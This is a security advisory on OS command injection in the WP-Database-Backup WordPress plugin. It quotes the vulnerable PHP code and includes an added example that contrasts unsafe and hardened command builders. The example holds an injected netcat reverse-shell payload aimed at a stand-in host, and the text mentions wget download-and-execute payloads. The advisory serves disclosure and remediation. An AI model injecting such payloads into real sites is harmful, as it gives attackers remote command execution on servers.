OS Command Injection in WP-Database-Backup

This vulnerability affects the WP-Database-Backup WordPress plugin. A crafted value stored in the WordPress option “wp_db_exclude_table” is concatenated into a shell command without escaping, so an attacker who can set that option can execute arbitrary OS commands on the host running WordPress.

Vulnerable code:

	// $cmd already holds the mysqldump command line at this point and is
	// later handed to the shell. The option value is a list of table names
	// the administrator chose to exclude from the backup.
	$wp_db_exclude_table = array();
	$wp_db_exclude_table = get_option('wp_db_exclude_table');
	if (!empty($wp_db_exclude_table)) {
	    // Each entry is appended verbatim: no escapeshellarg(), no
	    // validation that the entry is a bare table name.
	    foreach ($wp_db_exclude_table as $wp_db_exclude_table) {
	        $cmd .= ' --ignore-table=' . DB_NAME . '.' . $wp_db_exclude_table;
	        // error_log(DB_NAME.'.'.$wp_db_exclude_table);
	    }
	}

The code builds the mysqldump command line, appending “--ignore-table=DB_NAME.<entry>” for every entry in the wp_db_exclude_table list, and the resulting string is executed through the shell. Because the entries are concatenated without escaping or validation, shell metacharacters in an entry (for example “;”, “|” or backticks) terminate the mysqldump command and start a new one. A malicious third party able to write that option can therefore inject a payload such as a netcat reverse shell, or a wget request that downloads and executes a file, and it runs with the privileges of the web server user whenever a backup is taken.
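The following is an added example, not code from the plugin or from the advisory author. It reproduces the command-building loop above beside a hardened version, with DB_NAME and the option array stubbed so the script runs from the PHP CLI without WordPress; the malicious entry and the IP address in it are constructed for illustration. Nothing is executed, the script only prints the command strings that would be handed to the shell.

```php
<?php
// Added example (not the plugin's code): vulnerable and hardened builders
// for the mysqldump command line. DB_NAME is stubbed; in WordPress it is the
// constant from wp-config.php.
define('DB_NAME', 'wordpress');

// Constructed option value: one legitimate table name and one payload that
// closes the mysqldump command and starts a reverse shell (hypothetical
// attacker host 10.0.0.1, port 4444). Never run the vulnerable string.
$wp_db_exclude_table = array(
    'wp_options',
    'wp_posts; nc -e /bin/sh 10.0.0.1 4444 #',
);

// Vulnerable builder: entries are concatenated unescaped, exactly as in the
// affected plugin, so shell metacharacters in an entry are interpreted.
function build_dump_cmd_vulnerable(array $exclude) {
    $cmd = 'mysqldump ' . DB_NAME;
    foreach ($exclude as $table) {
        $cmd .= ' --ignore-table=' . DB_NAME . '.' . $table;
    }
    return $cmd;
}

// Hardened builder: every entry must be a bare MySQL identifier (letters,
// digits, underscore, at most 64 characters) and is additionally wrapped in
// escapeshellarg() so the shell sees one literal argument. Entries that fail
// validation abort the build instead of being silently dropped, because a
// tampered option is itself a sign of compromise.
function build_dump_cmd_hardened(array $exclude) {
    $cmd = 'mysqldump ' . escapeshellarg(DB_NAME);
    foreach ($exclude as $table) {
        if (!is_string($table) || !preg_match('/^[A-Za-z0-9_]{1,64}$/', $table)) {
            throw new InvalidArgumentException(
                'Rejected exclude-table entry: ' . var_export($table, true)
            );
        }
        $cmd .= ' --ignore-table=' . escapeshellarg(DB_NAME . '.' . $table);
    }
    return $cmd;
}

echo "Vulnerable: " . build_dump_cmd_vulnerable($wp_db_exclude_table) . "\n";
try {
    echo "Hardened:   " . build_dump_cmd_hardened($wp_db_exclude_table) . "\n";
} catch (InvalidArgumentException $e) {
    echo "Hardened:   " . $e->getMessage() . "\n";
}
```

The vulnerable output contains “; nc -e /bin/sh 10.0.0.1 4444 #” as part of the command line, which a shell would run as a second command; the hardened builder rejects the entry before any command string exists. The same identifier check should also be applied when the option is written, so a bad value never reaches the database in the first place.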

Recommendation:
If you run WordPress with this plugin, update the WP-Database-Backup plugin to the latest fixed version as soon as possible (see the Wordfence patch link below). Until then, review the stored wp_db_exclude_table option for entries that are not plain table names.

External Links:
Sucuri
Firo
WPVULN
Wordfence Patch

Author:
ethicalhack3r
WPSCAN.IO